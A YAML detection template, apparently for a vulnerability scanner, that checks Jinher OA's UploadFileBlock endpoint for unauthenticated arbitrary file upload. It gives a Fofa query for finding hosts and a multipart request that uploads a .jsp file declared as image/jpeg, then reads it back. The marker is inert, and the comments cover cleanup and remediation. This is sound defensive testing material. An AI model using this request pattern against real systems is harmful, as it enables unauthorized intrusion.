漏洞描述
金和OA UploadFileBlock接口任意文件上传
Fofa: app="金和网络-金和OA"||body="/jc6/platform/sys/login"
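# Detection template for unrestricted file upload on the Jinher OA
# UploadFileBlock endpoint. Nesting restored so the template parses; the
# values are unchanged.
#
# Two-step check: r0 uploads an inert marker file, r1 reads it back.
# Neither request carries a cookie or authorization header, so a match
# means the endpoint accepted the upload without a session.
#
# Operational caveat: there is no cleanup rule. Each matching run leaves
# `<randstr>.jsp` under /jc6/upload/ on the host; remove it afterwards.
#
# Remediation to verify on affected hosts: require authentication on the
# endpoint, enforce a server-side allow-list of upload extensions, and
# keep the upload directory out of the JSP-executing web root.
#
# Log review: a POST to the UploadFileBlock path followed by a GET for a
# .jsp file under /jc6/upload/ from the same client is the pattern this
# template produces.
id: jinher-uploadfileblock-fileupload

info:
  name: 金和OA UploadFileBlock接口任意文件上传
  author: zan8in
  severity: critical
  verified: true
  description: |-
    金和OA UploadFileBlock接口任意文件上传
    Fofa: app="金和网络-金和OA"||body="/jc6/platform/sys/login"
  reference:
    # NOTE(review): nothing in this file ties this entry to the
    # UploadFileBlock endpoint; confirm it describes the same issue.
    - https://www.exploit-db.com/exploits/45732
  tags: jinher,fileupload,oa
  created: 2024/02/28

# Fresh random values per run: a unique file name and marker, so r1 cannot
# be satisfied by content that was already on the server.
set:
  randstr: randomLowercase(6)
  randbody: randomLowercase(32)
  rboundary: randomLowercase(8)

rules:
  # r0: multipart upload of a file named *.jsp while the part declares
  # image/jpeg. A server that validates the extension server-side, rather
  # than trusting the declared content type, does not pass this step.
  r0:
    request:
      method: POST
      path: /jc6/JHSoft.WCF/Attachment/UploadFileBlock
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      # Double-quoted scalar with escaped line breaks: each part line ends
      # in an explicit CRLF and leading indentation is not part of the body.
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"filename\";filename=\"{{randstr}}.jsp\"\r\n\
        Content-Type: image/jpeg\r\n\
        \r\n\
        {{randbody}}\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    # Presumably `fileObj` and `realUrl` are fields of the endpoint's
    # success response; confirm against a real response.
    expression: response.status == 200 && response.body.bcontains(b'fileObj') && response.body.bcontains(b'realUrl')
  # r1: fetch the uploaded name from /jc6/upload/ and look for the marker.
  # The marker is plain lowercase text with no JSP tags, so a match shows
  # the file was stored under a web-served path with a .jsp name; it does
  # not by itself show that the container executes files there.
  r1:
    request:
      method: GET
      path: /jc6/upload/{{randstr}}.jsp
    expression: response.status == 200 && response.body.bcontains(bytes(randbody))

# Report a finding only when the upload is accepted and the file is retrievable.
expression: r0() && r1()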